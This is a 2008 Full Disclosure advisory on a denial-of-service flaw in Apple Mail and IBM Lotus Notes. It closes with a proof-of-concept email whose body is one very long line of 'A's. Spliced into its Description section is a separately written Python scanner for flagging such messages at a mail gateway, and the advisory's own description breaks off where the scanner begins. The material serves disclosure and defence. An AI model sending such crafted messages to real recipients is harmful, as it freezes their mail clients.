Full Disclosure mailing list archives

Apple Mail Denial of Service Vulnerability (with bonus IBM Lotus Notes DoS!)


From: David Wharton <security () davidwharton us>
Date: Thu, 29 May 2008 19:31:39 -0500


***Summary***

A maliciously crafted e-mail message can cause a denial of service in  
multiple versions of the Apple Mail email client.

***Scope***

Apple Mail version 3.1 (914/915)
Apple Mail version 3.2 (919/919.2)

Note: other versions of this product may be vulnerable as well; I have  
not tested them.  The vendor has been made aware of this issue and has  
chosen not to treat it as a security issue.

Interestingly enough, a similar issue seems to be present in multiple  
versions of IBM Lotus Notes (see SPR# EHET5X6Q5Z --  
http://www-1.ibm.com/support/docview.wss?rs=463&uid=swg21175611).  
The exploit provided in this advisory will also cause a denial of  
service condition on multiple versions of IBM Lotus Notes.  IBM has  
been kind enough to create SPR# PRAD7DPKLW to address the issue the  
exploit targets.

***Description***

An email message with a maliciously crafted body (in my tests I used a  
long line) can cause the e-mail client to hang, resulting in a denial  
of service condition.  Testing with emails that do not have any  
newline characters (0x0A, 0x0D) or spaces (0x20) shows that a line  
consisting of 1.5 MB can cause the email clients to hang for over half  
an hour.

Initial testing reveals the following:

In Apple Mail, the e-mail is rendered correctly in the preview pane  
but a subsequent click on a different e-mail causes the application to  
hang.
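The practical defence against this class of bug is to measure line length at a mail gateway or filter before the message reaches the client, and to measure it after transfer decoding: the advisory's sample is quoted-printable, so on the wire every line is soft-wrapped to 76 columns and looks harmless, while the decoded body is one unbroken run. The following scanner is an added example, not code from the advisory or from Apple or IBM. It decodes each text part with the standard library, reports the longest run of bytes that contains none of the characters the advisory names (0x0A, 0x0D, 0x20), and flags the message above a threshold; the threshold value and the constructed sample message are assumptions for the example.

```python
import email
import email.policy
import quopri

# Constructed threshold for this example: the advisory reports hangs with a
# 1.5 MB line; a filter can reject far shorter unbroken runs without harming
# legitimate mail.
MAX_UNBROKEN_RUN = 4096

# Bytes the advisory names as absent from the hanging body: LF, CR, space.
BREAK_BYTES = b"\n\r "


def longest_unbroken_run(data: bytes) -> int:
    """Length of the longest run of bytes containing none of BREAK_BYTES."""
    longest = current = 0
    for b in data:
        if b in BREAK_BYTES:
            current = 0
        else:
            current += 1
            if current > longest:
                longest = current
    return longest


def scan_message(raw: bytes, limit: int = MAX_UNBROKEN_RUN) -> dict:
    """Decode every text part of an RFC 822 message and report the longest
    unbroken run after transfer decoding, alongside the longest raw line as
    seen on the wire (which quoted-printable soft breaks keep short)."""
    msg = email.message_from_bytes(raw, policy=email.policy.default)
    max_run, worst_part = 0, None
    for part in msg.walk():
        if part.get_content_maintype() != "text":
            continue
        # decode=True undoes quoted-printable / base64 before measuring
        payload = part.get_payload(decode=True) or b""
        run = longest_unbroken_run(payload)
        if run > max_run:
            max_run, worst_part = run, part.get_content_type()
    wire_max_line = max((len(line) for line in raw.splitlines()), default=0)
    return {
        "max_run": max_run,
        "wire_max_line": wire_max_line,
        "flagged": max_run > limit,
        "part": worst_part,
    }


def build_sample(run_length: int) -> bytes:
    """Constructed fixture (not the advisory's message): a quoted-printable
    text/html message whose body holds one unbroken run of run_length 'A's,
    soft-wrapped at 76 columns on the wire like the advisory's sample."""
    body = b'<font size="2">' + b"A" * run_length + b"</font>"
    encoded = quopri.encodestring(body)
    headers = (
        b"Subject: constructed long-line sample\n"
        b"From: sender@example.invalid\n"
        b"To: recipient@example.invalid\n"
        b"MIME-Version: 1.0\n"
        b"Content-Type: text/html; charset=ISO-8859-1\n"
        b"Content-Transfer-Encoding: quoted-printable\n"
        b"\n"
    )
    return headers + encoded


if __name__ == "__main__":
    report = scan_message(build_sample(6000))
    print(report)
```

Run stand-alone, the report shows a wire line length no greater than 76 but a decoded run of over 6000 bytes and `flagged` set, which is exactly the gap a naive per-line check on the raw message would miss. A gateway applying this check would quarantine or hard-wrap the offending part rather than deliver it to a client known to stall on it.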

***Credits***

David Wharton

***References***

Apple Mail
http://www.apple.com/macosx/features/mail.html

***PoC Exploit***

Below is a sample e-mail with headers (some headers removed or  
modified) that causes the e-mail clients to hang as discussed.  Note  
that the body is one long line; the "=" at the end of each line is not  
part of the body but the quoted-printable soft line break used for  
formatting.  In reality most of the body is one long contiguous  
string of A's.

Subject: dos test
MIME-Version: 1.0
From: xxxxx () xxxxx com
To: xxxxx () xxxxx com
Date: xxxxx
Message-ID: <xxxxx.xxxxx-xxxxx.xxxxx-xxxxx.xxxxx () xxxxx com>
X-Mailer: xxxxx
MIME-Version: 1.0
Content-Type: text/html;
        charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
X-CTASD-RefID: str=xxxxx.xxxxx.xxxxx.xxxxx:xxxxx,ss=1,fgs=0
X-CTASD-IP: xxx.xxx.xxx.xxx
X-CTASD-Sender: xxxxx () xxxxx com
x-ctasd: uncategorized
x-ctasd-vod: uncategorized
x-ctasd-station:
X-OriginalArrivalTime: xxxxx@


<font  
size=3D"2">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
=
<snip> (removed a few thousand 'A's)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</ 
font>N=
OTICE:  This e-mail message and all attachments transmitted with it  
may con=
tain confidential information intended solely for the use of the  
addressee.=
<br />=

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
